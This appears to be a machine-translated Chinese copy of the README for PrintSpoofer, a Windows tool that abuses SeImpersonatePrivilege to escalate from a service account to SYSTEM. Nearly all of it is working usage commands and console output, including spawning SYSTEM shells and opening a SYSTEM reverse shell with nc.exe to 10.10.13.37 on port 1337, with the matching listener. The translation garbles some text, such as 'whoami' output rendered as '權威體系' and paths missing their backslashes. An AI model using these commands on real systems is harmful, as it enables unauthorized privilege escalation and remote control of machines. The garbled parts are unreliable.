列印欺騙者
PrintSpoofer
在 Windows 10 和 Server 2016/2019 上濫用SeImpersonatePrivilege
從本機/網路服務到系統。
您可以使用-h
選項檢查幫助訊息。
C:工具>PrintSpoofer.exe -h PrintSpoofer v0.1(作者:@itm4n) 如果目前使用者俱有 SeImpersonate 權限,則該工具將利用 Print 後台列印程式服務取得 SYSTEM 令牌,然後使用 CreateProcessAsUser() 執行自訂命令 論點: -c執行指令*CMD* -i 在目前命令提示字元下與新進程互動(預設為非互動) -d 在桌面上產生與此會話 *ID* 對應的新進程(使用 qwinsta 檢查您的 ID) -h 這就是我:) 範例: - 在目前控制台中以 SYSTEM 身分執行 PowerShell PrintSpoofer.exe -i -c powershell.exe - 在會話 1 的桌面上產生系統命令提示符 PrintSpoofer.exe -d 1 -c cmd.exe - 取得一個SYSTEM反向shell PrintSpoofer.exe -c“c:Tempnc.exe 10.10.13.37 1337 -e cmd”
如果您有互動式shell,則可以在目前控制台中建立新的 SYSTEM 進程。
使用案例:bind shell、reverse shell、 psexec.py
等。
C:工具>PrintSpoofer.exe -i -c cmd [+] 找到權限:SeImpersonatePrivilege [+] 命名管道監聽... [+] CreateProcessAsUser() 確定 微軟Windows [版本10.0.19613.1000] (c) 2020 微軟公司。版權所有。 C:WINDOWSsystem32>whoami 權威體系
如果您可以執行命令但沒有互動式 shell,則可以建立新的 SYSTEM 進程並立即退出,而不與其互動。
使用案例:WinRM、WebShell、 wmiexec.py
、 smbexec.py
等。
建立一個反向shell:
C:工具> PrintSpoofer.exe -c“C:TOOLSnc.exe 10.10.13.37 1337 -e cmd” [+] 找到權限:SeImpersonatePrivilege [+] 命名管道監聽... [+] CreateProcessAsUser() 確定
Netcat 監聽器:
C:工具>nc.exe -l -p 1337 微軟Windows [版本10.0.19613.1000] (c) 2020 微軟公司。版權所有。 C:WINDOWSsystem32>whoami 權威體系
如果您在本機或透過 RDP(包括 VDI)登錄,則可以在桌面上產生系統命令提示字元。首先,使用命令qwinsta
檢查您的會話 ID,然後使用選項-d
指定該值。
使用案例:終端會話 (RDP)、VDI
C:工具>qwinsta 會話名稱 使用者名稱 ID 狀態 類型 設備 服務 0 光碟 控制台管理員 1 活動 >rdp-tcp#3 實驗室用戶 3 活動 rdp-tcp 65536 聽 C:工具> PrintSpoofer.exe -d 3 -c“powershell -ep繞過” [+] 找到權限:SeImpersonatePrivilege [+] 命名管道監聽... [+] CreateProcessAsUser() 確定